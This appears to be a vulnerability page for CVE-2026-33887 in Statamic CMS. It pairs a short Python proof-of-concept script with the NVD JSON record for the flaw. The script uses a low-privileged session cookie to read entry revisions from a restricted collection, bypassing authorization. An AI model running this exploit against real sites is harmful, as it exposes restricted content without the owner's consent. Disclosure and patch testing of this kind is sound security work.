CVE-2026-33887

# Proof of Concept: Unauthorized Revision Access # Target: Statamic CMS < 5.73.16 / < 6.7.2 # Description: Accessing revisions of a restricted collection using a low-privileged user. import requests def check_vulnerability(target_url, session_cookie): # Identify a valid entry ID and collection ID (Reconnaissance required) collection_id = "blog" # Example collection entry_id = "1" # Example entry ID # Endpoint to access revisions url = f"{target_url}/cp/collections/{collection_id}/entries/{entry_id}/revisions" headers = { "Cookie": f"statamic_session={session_cookie}", "User-Agent": "CVE-2026-33887-PoC", "Accept": "application/json" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Successfully accessed unauthorized revisions.") print(f"[+] Response Data: {response.text[:200]}") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except Exception as e: print(f"[!] Error occurred: {e}") return False # Usage # target = "http://localhost:8000" # cookie = "low_priv_user_session_token" # check_vulnerability(target, cookie)

{"cve": {"id": "CVE-2026-33887", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:25.647", "lastModified": "2026-04-08T13:54:27.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, authenticated Control Panel users could view entry revisions for any collection with revisions enabled, regardless of whether they had the required collection permissions. This bypasses the authorization checks that the main entry controllers enforce, exposing entry field values and blueprint data. Users could also create entry revisions without edit permission, though this only snapshots the existing content state and does not affect published content. This has been fixed in 5.73.16 and 6.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.16", "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.2", "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-4hp7-3wxg-cv9q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}